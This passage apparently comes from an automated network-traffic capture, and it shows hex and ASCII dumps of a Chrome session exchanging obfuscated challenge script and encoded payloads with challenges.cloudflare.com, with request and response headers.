                                                                          2024-10-01 22:42:51 UTC1369INData Raw: 32 35 36 3e 43 5b 67 4d 28 31 30 34 33 29 5d 28 30 29 29 7b 69 66 28 64 5b 67 4d 28 38 31 31 29 5d 28 67 4d 28 31 35 30 35 29 2c 64 5b 67 4d 28 33 39 31 29 5d 29 29 7b 69 66 28 50 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 37 37 5d 5b 33 5d 5e 64 5b 67 4d 28 39 33 35 29 5d 28 74 68 69 73 2e 68 5b 64 5b 67 4d 28 33 32 34 29 5d 28 37 37 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 67 4d 28 31 30 34 33 29 5d 28 74 68 69 73 2e 68 5b 37 37 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 31 35 37 29 2b 32 35 36 26 32 35 35 2e 33 31 5e 39 33 2c 51 3d 64 5b 67 4d 28 31 30 37 30 29 5d 28 46 2c 74 68 69 73 29 2c 52 3d 74 68 69 73 2e 68 5b 64 5b 67 4d 28 33 32 34 29 5d 28 37 37 2c 74 68 69 73 2e 67 29 5d 5b 34 5d 2c 50 3d 3d 3d 31 30 38 29 50 3d 64 5b 67 4d 28 33 32 34 29
                                                                          Data Ascii: 256>C[gM(1043)](0)){if(d[gM(811)](gM(1505),d[gM(391)])){if(P=this.h[this.g^77][3]^d[gM(935)](this.h[d[gM(324)](77,this.g)][1][gM(1043)](this.h[77^this.g][0]++),157)+256&255.31^93,Q=d[gM(1070)](F,this),R=this.h[d[gM(324)](77,this.g)][4],P===108)P=d[gM(324)
                                                                          2024-10-01 22:42:51 UTC1369INData Raw: 73 3c 46 3b 48 3d 64 5b 67 4d 28 31 39 37 29 5d 28 48 3c 3c 31 2e 33 38 2c 31 26 4d 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67 4d 28 34 30 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 49 3d 3d 64 5b 67 4d 28 31 31 37 30 29 5d 28 6a 2c 31 29 29 7b 47 5b 67 4d 28 34 30 39 29 5d 28 64 5b 67 4d 28 37 38 32 29 5d 28 6f 2c 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 67 4d 28 32 37 34 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 4f 29 7b 72 65 74 75 72 6e 20 67 4f 3d 67 4a 2c 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 64 5b 67 4f 28 31 33 32 39 29 5d 28 27 27 2c 68 29 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 67
                                                                          Data Ascii: s<F;H=d[gM(197)](H<<1.38,1&M),j-1==I?(I=0,G[gM(409)](o(H)),H=0):I++,M>>=1,s++);for(;;)if(H<<=1,I==d[gM(1170)](j,1)){G[gM(409)](d[gM(782)](o,H));break}else I++;return G[gM(274)]('')},'j':function(h,gO){return gO=gJ,null==h?'':d[gO(1329)]('',h)?null:f.i(h[g
                                                                          2024-10-01 22:42:51 UTC1369INData Raw: 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 67 51 28 38 38 35 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4f 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 51 28 31 30 39 30 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4e 3d 64 5b 67 51 28 35 31 32 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 67 51 28 31 32 38 31 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 67 51 28 39 33 38 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4f 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 67 51
                                                                          Data Ascii: (o,I++)),J|=(d[gQ(885)](0,N)?1:0)*F,F<<=1);s[B++]=e(J),O=B-1,x--;break;case 1:for(J=0,K=Math[gQ(1090)](2,16),F=1;F!=K;N=d[gQ(512)](G,H),H>>=1,d[gQ(1281)](0,H)&&(H=j,G=o(I++)),J|=(d[gQ(938)](0,N)?1:0)*F,F<<=1);s[B++]=e(J),O=B-1,x--;break;case 2:return D[gQ
                                                                          2024-10-01 22:42:51 UTC1369INData Raw: 47 2c 68 43 2c 48 29 7b 66 6f 72 28 68 43 3d 68 41 2c 47 5b 68 43 28 31 31 32 31 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b 68 43 28 31 31 35 33 29 5d 3b 47 5b 48 5d 3d 3d 3d 47 5b 6f 5b 68 43 28 37 37 35 29 5d 28 48 2c 31 29 5d 3f 47 5b 68 43 28 31 33 31 37 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 41 28 38 31 30 29 5d 5b 68 41 28 31 30 32 37 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 41 28 31 31 35 33 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 66 35 28 67 2c 68 2c 44 29 2c 6f 5b 68 41 28 31 30 36 32 29 5d 28 42 2c 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 68 41 28 37 30 36 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 41 28 39 39 31
                                                                          Data Ascii: G,hC,H){for(hC=hA,G[hC(1121)](),H=0;H<G[hC(1153)];G[H]===G[o[hC(775)](H,1)]?G[hC(1317)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[hA(810)][hA(1027)](B),C=0;C<x[hA(1153)];D=x[C],E=f5(g,h,D),o[hA(1062)](B,E)?(F=E==='s'&&!g[hA(706)](h[D]),o[hA(991
                                                                          2024-10-01 22:42:51 UTC1369INData Raw: 75 72 6e 20 69 5b 68 45 28 32 37 34 29 5d 28 27 27 29 7d 2c 66 61 3d 5b 5d 2c 66 62 3d 30 3b 32 35 36 3e 66 62 3b 66 61 5b 66 62 5d 3d 53 74 72 69 6e 67 5b 67 49 28 39 39 32 29 5d 28 66 62 29 2c 66 62 2b 2b 29 3b 66 63 3d 28 30 2c 65 76 61 6c 29 28 67 49 28 35 37 35 29 29 2c 66 64 3d 61 74 6f 62 28 67 49 28 31 34 38 30 29 29 2c 65 4d 5b 67 49 28 34 37 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 67 2c 64 2c 65 2c 66 2c 67 29 7b 69 67 3d 67 49 2c 64 3d 7b 7d 2c 64 5b 69 67 28 31 34 33 34 29 5d 3d 69 67 28 31 33 38 36 29 2c 64 5b 69 67 28 31 30 32 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 69 67 28 34 33 34 29 5d 5b 69 67 28 36 32 35 29 5d 28 65 5b 69 67 28 31
                                                                          Data Ascii: urn i[hE(274)]('')},fa=[],fb=0;256>fb;fa[fb]=String[gI(992)](fb),fb++);fc=(0,eval)(gI(575)),fd=atob(gI(1480)),eM[gI(472)]=function(ig,d,e,f,g){ig=gI,d={},d[ig(1434)]=ig(1386),d[ig(1025)]=function(h,i){return h<<i},e=d,f=1,g=1e3*eM[ig(434)][ig(625)](e[ig(1


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.649740104.18.95.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:51 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 2725
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: bcbf9bd71f426c2
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:51 UTC2725OUTData Raw: 76 5f 38 63 62 66 66 37 64 30 31 39 36 32 63 33 33 64 3d 25 32 62 66 55 5a 58 5a 69 5a 66 5a 79 5a 36 7a 4e 6b 7a 4e 48 5a 7a 44 43 59 39 61 7a 57 4e 39 4e 56 68 44 6a 31 32 4e 30 75 76 4e 32 32 7a 4a 4e 6c 4e 42 44 57 59 71 32 4e 63 4e 78 79 59 43 59 49 68 32 4c 4e 6a 44 7a 79 4e 4b 63 4c 31 63 6a 4e 78 62 4e 6a 39 4e 7a 77 4e 39 75 5a 66 74 42 4e 37 44 43 38 6d 63 56 31 6c 24 32 74 4e 57 62 78 51 4a 48 77 56 53 37 4e 37 52 5a 53 39 52 48 44 75 42 58 54 7a 5a 57 71 7a 75 4e 57 55 78 42 6a 71 6c 58 4e 6a 59 72 6f 5a 78 37 56 6d 52 62 67 4f 53 51 7a 5a 78 2b 63 32 78 47 78 5a 32 5a 79 5a 4e 6f 2b 4e 78 73 42 55 4e 2d 59 6d 6c 32 4e 7a 53 4e 74 33 59 53 2d 6f 62 37 6a 43 62 4e 4b 44 4e 49 4e 78 71 4e 6f 5a 4e 46 4b 62 56 4e 6e 32 4e 76 78 5a 4e 67 72 38 7a
                                                                          Data Ascii: v_8cbff7d01962c33d=%2bfUZXZiZfZyZ6zNkzNHZzDCY9azWN9NVhDj12N0uvN22zJNlNBDWYq2NcNxyYCYIh2LNjDzyNKcL1cjNxbNj9NzwN9uZftBN7DC8mcV1l$2tNWbxQJHwVS7N7RZS9RHDuBXTzZWqzuNWUxBjqlXNjYroZx7VmRbgOSQzZx+c2xGxZ2ZyZNo+NxsBUN-Yml2NzSNt3YS-ob7jCbNKDNINxqNoZNFKbVNn2NvxZNgr8z
                                                                          2024-10-01 22:42:52 UTC717INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:51 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 152088
                                                                          Connection: close
                                                                          cf-chl-gen: S8bOaOwloskylrbkIszI8tmwIp4nPLZAXM3D4GEf6cM/22Jn4PTmQ9S3fQ9AD0QZehdOREtR8mYIcJVjZxq8RlFiWQ170Y8qilV/Wug0RORPqpFEiEbo8VhtLuyNOgoedaBt3j74ywlrhNwAhRzJarw0tzFTYE+k5iExbzq2yU3DxXabMhedbdfXVbDUZ4GoUxbUdKiIE7O2Qz2Ao1OiNQsQ2Qe/gjWL+Uzg30c3Leni+KmG/vRi0IUvsegjIHGM149cR1VJgP/Bqk43uBWVVtfnfWot/uWFqw6hnfo5xH2CTC6aH4wyjdEBMD8s7bOnr/cPvDN9m2zP1oQcTlldjv8hvvEHnMSe+3RG1DYq2pTanpGMryhC+5eCkQAhEO3Cinw6XDP6xt6cAwg262fyPxdHu+y7Pj4L9cSJZvR8zxHbAJHolSy9OGA8CgKb0cQucnL/dyWKl/HcCWDV/0+ikbAtlPugu+IGcYK6QhzitE+HqX8=$s2AVnvJtgQ6nBKOn
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7e26ede8c39-EWR
                                                                          2024-10-01 22:42:52 UTC652INData Raw: 64 58 4a 6d 62 57 31 58 64 32 2b 4e 57 35 2b 58 59 56 71 69 6a 70 74 6b 70 5a 35 6b 66 5a 35 6f 67 6f 75 72 6e 61 5a 75 62 57 69 6e 68 32 75 5a 6b 4c 79 37 66 49 32 32 6a 72 4b 6a 6b 35 79 67 6e 4d 6a 44 69 4a 6d 46 6d 35 76 44 6e 38 2b 4d 71 5a 2f 50 76 73 43 6e 73 36 66 4a 31 74 75 59 74 4f 48 62 31 74 61 31 74 70 7a 62 74 35 76 4b 33 4d 33 48 76 38 54 78 7a 62 44 42 36 2b 54 73 36 73 62 49 31 64 44 39 31 62 7a 52 7a 72 50 4e 38 76 69 33 30 66 54 59 30 67 6a 34 79 4f 66 75 35 42 4c 6c 30 4f 4c 6b 36 73 77 46 45 4f 37 51 43 75 77 53 31 50 6f 41 33 64 67 42 39 68 59 41 41 42 76 30 47 4e 30 43 2b 76 67 45 4b 67 45 4b 4c 50 51 72 38 50 59 50 37 7a 76 37 4b 67 59 50 2f 52 66 37 4e 45 50 2b 46 30 56 4a 51 7a 73 6b 4a 44 30 38 4f 7a 77 50 55 45 4a 56 52 77 67
                                                                          Data Ascii: dXJmbW1Xd2+NW5+XYVqijptkpZ5kfZ5ogournaZubWinh2uZkLy7fI22jrKjk5ygnMjDiJmFm5vDn8+MqZ/PvsCns6fJ1tuYtOHb1ta1tpzbt5vK3M3Hv8TxzbDB6+Ts6sbI1dD91bzRzrPN8vi30fTY0gj4yOfu5BLl0OLk6swFEO7QCuwS1PoA3dgB9hYAABv0GN0C+vgEKgEKLPQr8PYP7zv7KgYP/Rf7NEP+F0VJQzskJD08OzwPUEJVRwg
                                                                          2024-10-01 22:42:52 UTC1369INData Raw: 59 33 45 2b 56 46 39 37 64 56 6c 6c 67 6c 56 6c 59 6c 70 4b 6b 49 75 50 58 35 56 7a 55 6e 6c 6a 59 35 42 77 64 48 2b 58 56 35 70 72 70 47 47 62 67 48 2b 61 6d 48 71 66 66 47 79 47 66 71 64 6a 67 58 75 77 67 61 79 55 6c 59 78 32 6c 71 79 4e 63 4c 2b 34 73 37 79 6a 65 35 43 75 6c 35 43 34 6d 58 32 36 78 71 53 6a 75 5a 47 53 31 4a 50 52 7a 70 57 68 79 63 61 57 75 70 72 59 72 71 6a 4d 6f 64 6a 46 75 4a 33 68 34 64 76 67 32 38 50 67 78 73 65 38 76 64 76 4a 30 63 54 52 30 65 62 59 36 39 58 71 38 4e 6e 5a 37 76 50 7a 33 66 4c 35 34 65 48 32 2f 64 58 6c 2b 67 45 51 36 66 34 44 37 65 30 44 42 68 6a 78 42 77 6f 4d 39 51 73 51 2b 66 6b 50 46 4f 33 39 45 78 66 63 35 52 6a 68 4a 79 77 62 48 51 38 71 41 41 77 6e 49 75 6f 68 4e 66 49 36 46 52 45 72 48 41 34 76 43 42 6e
                                                                          Data Ascii: Y3E+VF97dVllglVlYlpKkIuPX5VzUnljY5BwdH+XV5prpGGbgH+amHqffGyGfqdjgXuwgayUlYx2lqyNcL+4s7yje5Cul5C4mX26xqSjuZGS1JPRzpWhycaWuprYrqjModjFuJ3h4dvg28Pgxse8vdvJ0cTR0ebY69Xq8NnZ7vPz3fL54eH2/dXl+gEQ6f4D7e0DBhjxBwoM9QsQ+fkPFO39Exfc5RjhJywbHQ8qAAwnIuohNfI6FRErHA4vCBn
                                                                          2024-10-01 22:42:52 UTC1369INData Raw: 49 46 65 67 46 71 4d 65 59 52 59 53 6c 39 72 62 58 4b 50 63 58 53 4c 64 6d 75 49 65 35 71 4f 65 6f 70 30 62 58 31 36 65 48 47 41 66 6e 78 31 67 32 4f 71 66 6f 35 76 68 48 32 42 70 62 53 69 69 71 47 46 63 58 65 58 6b 33 61 4b 6b 59 70 35 72 4b 57 62 6b 62 43 70 6e 35 6d 30 72 61 4c 48 75 4c 47 6d 7a 73 61 4c 74 72 58 44 79 37 61 53 31 62 69 2f 77 4d 72 53 6d 35 2f 55 32 36 4f 6e 75 4f 69 7a 76 39 6e 64 74 73 37 4d 76 72 44 46 73 75 33 4f 31 38 43 76 2b 65 62 46 73 37 53 36 30 63 33 78 31 65 44 50 39 77 44 45 2b 77 6f 43 39 2b 4c 4b 33 4e 72 67 42 67 30 4c 38 63 38 59 42 77 6f 4d 39 51 73 51 2b 66 6b 50 46 4f 33 39 45 78 66 63 35 52 6a 68 4a 79 77 62 48 51 38 71 41 41 77 6e 49 75 72 78 4d 77 45 47 43 43 38 48 46 44 49 7a 43 78 6b 6a 44 44 67 53 4f 79 67 56
                                                                          Data Ascii: IFegFqMeYRYSl9rbXKPcXSLdmuIe5qOeop0bX16eHGAfnx1g2Oqfo5vhH2BpbSiiqGFcXeXk3aKkYp5rKWbkbCpn5m0raLHuLGmzsaLtrXDy7aS1bi/wMrSm5/U26OnuOizv9ndts7MvrDFsu3O18Cv+ebFs7S60c3x1eDP9wDE+woC9+LK3NrgBg0L8c8YBwoM9QsQ+fkPFO39Exfc5RjhJywbHQ8qAAwnIurxMwEGCC8HFDIzCxkjDDgSOygV
                                                                          2024-10-01 22:42:52 UTC1369INData Raw: 64 63 66 57 52 37 6c 49 52 69 5a 31 4e 6e 64 46 64 76 63 48 75 66 63 59 74 62 66 49 36 6b 63 4a 53 57 57 32 43 66 59 6d 57 44 69 57 5a 6f 72 61 53 56 73 71 39 78 6b 33 4b 4e 64 59 65 72 71 4a 56 32 76 72 32 7a 68 4d 4c 42 76 4a 57 43 6e 59 53 43 79 73 47 6e 6e 4b 65 51 70 62 47 6b 72 39 65 6b 79 62 71 72 6d 72 66 4b 31 4a 76 4d 76 4c 7a 5a 70 4f 4f 77 75 38 4f 2f 74 36 76 41 31 37 36 36 36 62 47 74 73 63 44 4e 78 39 50 46 78 4e 44 75 79 64 6b 41 37 50 54 51 33 64 58 7a 39 2b 44 5a 77 2b 45 4d 32 51 50 76 33 4f 62 6a 79 67 63 47 41 76 51 49 36 41 50 35 36 4e 67 48 31 78 4d 58 45 52 30 61 37 64 73 50 35 2b 67 5a 4a 43 66 72 49 67 72 33 41 69 55 7a 4d 67 45 41 4f 44 51 35 4c 43 77 6d 4b 44 41 63 43 44 6f 63 4f 6a 63 31 4a 6a 73 49 4f 55 52 43 47 77 30 6b 48
                                                                          Data Ascii: dcfWR7lIRiZ1NndFdvcHufcYtbfI6kcJSWW2CfYmWDiWZoraSVsq9xk3KNdYerqJV2vr2zhMLBvJWCnYSCysGnnKeQpbGkr9ekybqrmrfK1JvMvLzZpOOwu8O/t6vA17666bGtscDNx9PFxNDuydkA7PTQ3dXz9+DZw+EM2QPv3ObjygcGAvQI6AP56NgH1xMXER0a7dsP5+gZJCfrIgr3AiUzMgEAODQ5LCwmKDAcCDocOjc1JjsIOURCGw0kH
                                                                          2024-10-01 22:42:52 UTC1369INData Raw: 7a 6a 70 4b 4c 6a 33 43 61 6d 35 32 51 65 58 79 69 6c 36 4f 6d 70 34 4a 2f 59 70 61 70 67 32 74 33 61 35 43 6a 6a 6e 4b 74 6b 4a 57 41 64 4b 4b 76 70 72 4b 6d 6b 5a 47 4d 76 34 32 76 72 4c 7a 42 6a 36 6d 63 79 70 61 43 6d 36 4f 62 6a 36 4f 64 31 4a 54 52 7a 73 6a 43 6a 36 33 54 32 4d 2b 36 72 39 6d 38 77 4e 72 66 30 72 53 38 36 65 48 47 31 74 6a 5a 70 37 6a 46 79 38 2f 4b 78 50 62 6f 78 2b 2f 51 77 2f 44 63 38 73 2f 4d 31 74 6e 58 75 66 72 79 32 66 54 34 31 77 50 58 2f 74 37 65 36 65 48 2b 79 63 30 4d 43 50 4c 6f 34 4e 54 78 44 66 58 30 36 4e 62 38 41 78 72 72 32 77 63 65 38 42 73 61 43 75 67 65 36 68 7a 73 45 69 4d 4e 44 2f 51 6c 47 50 41 53 46 52 55 33 45 6a 45 79 51 42 67 72 4e 78 59 32 48 77 45 5a 42 79 68 4b 51 6b 34 64 54 67 73 62 47 77 30 4e 50 55
                                                                          Data Ascii: zjpKLj3Cam52QeXyil6Omp4J/Ypapg2t3a5CjjnKtkJWAdKKvprKmkZGMv42vrLzBj6mcypaCm6Obj6Od1JTRzsjCj63T2M+6r9m8wNrf0rS86eHG1tjZp7jFy8/KxPbox+/Qw/Dc8s/M1tnXufry2fT41wPX/t7e6eH+yc0MCPLo4NTxDfX06Nb8Axrr2wce8BsaCuge6hzsEiMND/QlGPASFRU3EjEyQBgrNxY2HwEZByhKQk4dTgsbGw0NPU
                                                                          2024-10-01 22:42:52 UTC1369INData Raw: 6a 58 35 78 66 5a 4f 5a 62 59 57 47 65 49 5a 6c 70 49 53 54 6f 4a 69 72 6e 58 6d 6c 6a 58 79 48 69 35 65 72 6a 71 6d 62 69 5a 32 72 74 5a 32 61 73 35 4f 32 74 72 79 7a 76 34 43 61 77 71 79 46 66 35 61 64 73 61 57 65 7a 63 2b 2b 6b 71 6d 71 7a 62 75 78 72 4a 54 55 76 71 43 33 71 39 58 66 76 2b 66 46 79 4e 33 4c 30 38 48 65 35 65 4c 69 33 2b 69 6c 77 4f 6e 57 79 63 6a 6d 31 4f 6a 71 72 37 37 34 32 37 72 57 34 73 38 43 76 74 2f 61 33 77 51 41 35 2b 49 4f 78 76 6a 4c 36 52 44 68 44 4e 4c 6b 37 2b 76 52 45 39 63 4b 2f 66 41 59 44 64 54 37 2f 50 7a 35 2f 51 62 2b 33 43 48 6e 48 41 6e 71 37 65 34 41 43 53 38 73 42 79 37 76 4d 41 77 49 38 7a 51 51 43 50 63 34 45 2f 6e 32 41 54 49 78 51 30 41 62 4b 69 41 58 42 6b 64 48 4b 56 52 50 42 30 77 56 57 55 38 33 57 79 78
                                                                          Data Ascii: jX5xfZOZbYWGeIZlpISToJirnXmljXyHi5erjqmbiZ2rtZ2as5O2tryzv4CawqyFf5adsaWezc++kqmqzbuxrJTUvqC3q9Xfv+fFyN3L08He5eLi3+ilwOnWycjm1Ojqr77427rW4s8Cvt/a3wQA5+IOxvjL6RDhDNLk7+vRE9cK/fAYDdT7/Pz5/Qb+3CHnHAnq7e4ACS8sBy7vMAwI8zQQCPc4E/n2ATIxQ0AbKiAXBkdHKVRPB0wVWU83Wyx
                                                                          2024-10-01 22:42:52 UTC1369INData Raw: 6e 56 62 6d 36 4e 39 65 5a 57 61 68 35 78 36 6d 72 43 64 61 71 36 46 68 35 4f 4c 71 48 47 44 67 33 75 30 6e 35 74 36 73 35 36 56 65 36 44 48 68 59 65 36 67 38 6d 34 70 4b 2b 63 6d 71 4f 4a 69 39 4c 42 74 4a 4f 53 77 61 6a 62 33 4d 2f 49 70 38 6a 56 32 73 79 78 78 64 48 57 77 39 69 32 31 75 7a 5a 70 71 62 78 7a 37 2f 44 74 4d 7a 6f 34 63 4c 43 32 62 54 6b 75 63 66 30 33 76 69 2b 30 4e 72 58 76 76 4c 2b 38 73 58 67 41 2b 30 44 78 77 33 38 30 4f 58 69 37 51 6a 33 2b 65 7a 6d 46 68 59 51 32 76 33 34 46 4f 77 52 4a 64 66 6d 34 43 72 69 41 50 33 73 4b 79 6b 63 2b 76 6f 53 37 42 33 78 41 43 30 58 4d 66 59 4a 45 78 44 32 48 54 63 72 2f 67 31 43 4d 41 45 6c 52 7a 59 72 49 55 4d 75 51 77 68 4e 50 52 45 6d 4a 69 35 49 4f 44 6f 77 4a 31 5a 57 55 42 73 2b 4f 56 51 74
                                                                          Data Ascii: nVbm6N9eZWah5x6mrCdaq6Fh5OLqHGDg3u0n5t6s56Ve6DHhYe6g8m4pK+cmqOJi9LBtJOSwajb3M/Ip8jV2syxxdHWw9i21uzZpqbxz7/DtMzo4cLC2bTkucf03vi+0NrXvvL+8sXgA+0Dxw380OXi7Qj3+ezmFhYQ2v34FOwRJdfm4CriAP3sKykc+voS7B3xAC0XMfYJExD2HTcr/g1CMAElRzYrIUMuQwhNPREmJi5IODowJ1ZWUBs+OVQt
                                                                          2024-10-01 22:42:52 UTC1369INData Raw: 78 31 66 34 4b 41 65 59 4b 47 68 48 32 4e 69 6f 69 42 6b 49 36 4d 68 5a 4e 7a 75 6f 36 65 66 35 53 4e 6b 62 58 45 73 70 71 78 6c 59 71 32 69 70 6d 47 77 4b 47 61 69 62 79 31 71 74 43 79 6c 4b 36 73 79 35 69 56 73 4a 6d 67 76 4c 4b 36 77 72 62 61 74 39 50 66 35 74 58 46 79 4d 2f 6b 78 72 37 71 36 71 7a 79 39 2b 62 71 73 4c 6e 72 74 66 6f 41 37 76 44 69 2f 64 50 66 2b 76 57 2b 34 75 44 35 7a 41 44 71 33 2f 7a 4b 32 67 67 52 34 75 6a 68 35 51 6f 5a 42 2b 34 47 36 64 55 63 38 42 48 36 44 2b 4c 7a 45 2f 72 39 49 66 77 75 37 41 73 42 49 4f 77 7a 41 77 73 4e 38 66 4d 49 4a 44 41 33 4a 68 67 5a 4c 77 73 63 4e 54 73 37 2f 66 30 6f 4f 44 30 37 54 44 73 39 4c 30 6f 67 4c 45 64 43 43 78 49 4f 46 6c 6f 6c 4d 55 73 38 4f 46 41 79 4b 30 77 5a 4d 53 39 47 55 7a 78 59 61
                                                                          Data Ascii: x1f4KAeYKGhH2NioiBkI6MhZNzuo6ef5SNkbXEspqxlYq2ipmGwKGaiby1qtCylK6sy5iVsJmgvLK6wrbat9Pf5tXFyM/kxr7q6qzy9+bqsLnrtfoA7vDi/dPf+vW+4uD5zADq3/zK2ggR4ujh5QoZB+4G6dUc8BH6D+LzE/r9Ifwu7AsBIOwzAwsN8fMIJDA3JhgZLwscNTs7/f0oOD07TDs9L0ogLEdCCxIOFlolMUs8OFAyK0wZMS9GUzxYa
                                                                          2024-10-01 22:42:52 UTC1369INData Raw: 6c 67 57 57 4f 69 6d 36 44 64 6f 75 4a 6c 59 53 78 6e 71 71 41 72 72 61 68 6e 72 65 38 70 5a 32 66 76 4a 69 66 68 4d 57 36 73 61 57 63 6e 6f 62 52 70 49 6e 4f 75 62 4b 34 31 4e 48 4c 73 61 75 58 76 73 44 57 6d 39 48 58 6d 71 50 42 36 4d 72 72 75 36 58 72 30 75 44 68 30 4f 37 50 73 62 58 7a 2b 74 66 75 37 76 54 7a 32 39 62 61 30 75 36 33 77 65 62 52 77 2b 48 46 37 41 58 4f 45 63 34 42 2b 2b 62 2b 33 75 73 49 30 4e 50 78 47 66 4d 58 38 78 37 73 32 76 55 4d 49 65 44 64 2f 66 50 70 39 65 55 64 41 77 51 78 38 43 45 63 4a 52 2f 6e 39 69 41 78 38 78 4c 31 48 54 63 55 51 66 37 35 4f 2f 30 4f 4e 76 67 67 4b 67 64 46 47 79 41 70 4f 55 4a 41 43 79 41 71 49 52 49 67 49 42 68 52 50 44 68 46 47 30 78 50 59 6a 4d 33 50 44 30 39 4f 55 5a 47 50 79 63 35 51 30 41 6e 55 57
                                                                          Data Ascii: lgWWOim6DdouJlYSxnqqArrahnre8pZ2fvJifhMW6saWcnobRpInOubK41NHLsauXvsDWm9HXmqPB6Mrru6Xr0uDh0O7PsbXz+tfu7vTz29ba0u63webRw+HF7AXOEc4B++b+3usI0NPxGfMX8x7s2vUMIeDd/fPp9eUdAwQx8CEcJR/n9iAx8xL1HTcUQf75O/0ONvggKgdFGyApOUJACyAqIRIgIBhRPDhFG0xPYjM3PD09OUZGPyc5Q0AnUW


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.649745104.18.94.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:53 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:53 UTC349INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 01 Oct 2024 22:42:53 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: iVUfkqzDj6ISIDnRlVCYRvDMHq8s6XDDntU=$SfM5gXKhzaY16mU0
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7ec3b9443dd-EWR
